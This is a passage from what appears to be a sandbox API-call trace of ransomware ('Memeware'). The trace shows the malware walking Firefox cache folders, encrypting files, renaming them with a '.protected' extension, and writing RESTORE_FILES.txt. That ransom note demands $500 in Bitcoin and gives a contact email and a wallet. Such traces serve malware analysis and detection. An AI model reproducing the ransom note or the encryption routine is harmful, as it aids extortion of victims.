nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.314] CloseHandle (hObject=0x158) returned 1 [0086.315] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.315] lstrcmpiW (lpString1="E", lpString2="Windows") returned -1 [0086.315] lstrcmpiW (lpString1="E", lpString2="Program Files") returned -1 [0086.315] lstrcmpiW (lpString1="E", lpString2="Program Files (x86)") returned -1 [0086.315] lstrcmpiW (lpString1="E", lpString2="$Recycle.bin") returned 1 [0086.315] lstrcmpiW (lpString1="E", lpString2="System Volume Information") returned -1 [0086.315] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E") returned 97 [0086.315] lstrcmpW (lpString1="E", lpString2=".") returned 1 [0086.315] lstrcmpW (lpString1="E", lpString2="..") returned 1 [0086.316] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\*") returned 99 [0086.316] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.316] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.316] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.316] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.316] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.316] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.316] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\.") returned 99 [0086.316] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.316] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.316] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.316] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.316] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.316] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.316] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.317] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\..") returned 100 [0086.317] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.317] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.317] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.317] lstrcmpiW (lpString1="69", lpString2="Windows") returned -1 [0086.317] lstrcmpiW (lpString1="69", lpString2="Program Files") returned -1 [0086.317] lstrcmpiW (lpString1="69", lpString2="Program Files (x86)") returned -1 [0086.317] lstrcmpiW (lpString1="69", lpString2="$Recycle.bin") returned 1 [0086.317] lstrcmpiW (lpString1="69", lpString2="System Volume Information") returned -1 [0086.317] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69") returned 100 [0086.317] lstrcmpW (lpString1="69", lpString2=".") returned 1 [0086.317] lstrcmpW (lpString1="69", lpString2="..") returned 1 [0086.317] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\*") returned 102 [0086.317] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.318] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.318] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.318] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.318] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.318] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.318] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\.") returned 102 [0086.318] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.318] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.318] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.318] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.318] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.318] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.318] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.318] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\..") returned 103 [0086.318] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.318] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.318] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.318] lstrcmpiW (lpString1="885EEd01", lpString2="Windows") returned -1 [0086.318] lstrcmpiW (lpString1="885EEd01", lpString2="Program Files") returned -1 [0086.318] lstrcmpiW (lpString1="885EEd01", lpString2="Program Files (x86)") returned -1 [0086.318] lstrcmpiW (lpString1="885EEd01", lpString2="$Recycle.bin") returned 1 [0086.318] lstrcmpiW (lpString1="885EEd01", lpString2="System Volume Information") returned -1 [0086.318] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01") returned 109 [0086.318] StrStrIW (lpFirst="885EEd01", lpSrch=".protected") returned 0x0 [0086.318] lstrcmpW (lpString1="885EEd01", lpString2="RESTORE_FILES.txt") returned -1 [0086.318] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.318] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01") returned 109 [0086.319] StrStrW (lpFirst="885EEd01", lpSrch=".txt") returned 0x0 [0086.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01") returned 109 [0086.319] StrStrW (lpFirst="885EEd01", lpSrch=".rar") returned 0x0 [0086.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01") returned 109 [0086.319] StrStrW (lpFirst="885EEd01", lpSrch=".zip") returned 0x0 [0086.319] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.346] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.346] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.347] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.347] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.347] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.347] CloseHandle (hObject=0x160) returned 1 [0086.347] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01.protected") returned 119 [0086.347] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01.protected")) returned 1 [0086.349] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.349] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.349] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\RESTORE_FILES.txt") returned 118 [0086.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.350] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.350] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.350] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.350] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.350] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.351] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.351] CloseHandle (hObject=0x15c) returned 1 [0086.351] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.351] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.351] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\RESTORE_FILES.txt") returned 115 [0086.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.351] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.351] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.352] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.352] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.352] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.352] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.352] CloseHandle (hObject=0x158) returned 1 [0086.353] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.353] lstrcmpiW (lpString1="F", lpString2="Windows") returned -1 [0086.353] lstrcmpiW (lpString1="F", lpString2="Program Files") returned -1 [0086.354] lstrcmpiW (lpString1="F", lpString2="Program Files (x86)") returned -1 [0086.354] lstrcmpiW (lpString1="F", lpString2="$Recycle.bin") returned 1 [0086.354] lstrcmpiW (lpString1="F", lpString2="System Volume Information") returned -1 [0086.354] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F") returned 97 [0086.354] lstrcmpW (lpString1="F", lpString2=".") returned 1 [0086.354] lstrcmpW (lpString1="F", lpString2="..") returned 1 [0086.354] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\*") returned 99 [0086.354] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.355] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.355] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.355] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.355] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.355] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.355] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\.") returned 99 [0086.355] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.355] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.355] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.355] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.355] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.355] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.355] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.355] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\..") returned 100 [0086.355] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.355] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.355] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.355] lstrcmpiW (lpString1="23", lpString2="Windows") returned -1 [0086.355] lstrcmpiW (lpString1="23", lpString2="Program Files") returned -1 [0086.355] lstrcmpiW (lpString1="23", lpString2="Program Files (x86)") returned -1 [0086.355] lstrcmpiW (lpString1="23", lpString2="$Recycle.bin") returned 1 [0086.355] lstrcmpiW (lpString1="23", lpString2="System Volume Information") returned -1 [0086.355] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23") returned 100 [0086.355] lstrcmpW (lpString1="23", lpString2=".") returned 1 [0086.355] lstrcmpW (lpString1="23", lpString2="..") returned 1 [0086.356] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\*") returned 102 [0086.356] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.356] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.356] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.356] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.356] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.356] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.356] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\.") returned 102 [0086.356] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.356] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.356] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.356] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.356] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.356] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.356] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.356] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\..") returned 103 [0086.356] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.356] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.356] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.357] lstrcmpiW (lpString1="7E0FEd01", lpString2="Windows") returned -1 [0086.357] lstrcmpiW (lpString1="7E0FEd01", lpString2="Program Files") returned -1 [0086.357] lstrcmpiW (lpString1="7E0FEd01", lpString2="Program Files (x86)") returned -1 [0086.357] lstrcmpiW (lpString1="7E0FEd01", lpString2="$Recycle.bin") returned 1 [0086.357] lstrcmpiW (lpString1="7E0FEd01", lpString2="System Volume Information") returned -1 [0086.357] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01") returned 109 [0086.357] StrStrIW (lpFirst="7E0FEd01", lpSrch=".protected") returned 0x0 [0086.357] lstrcmpW (lpString1="7E0FEd01", lpString2="RESTORE_FILES.txt") returned -1 [0086.357] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.357] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.357] CreateFileW 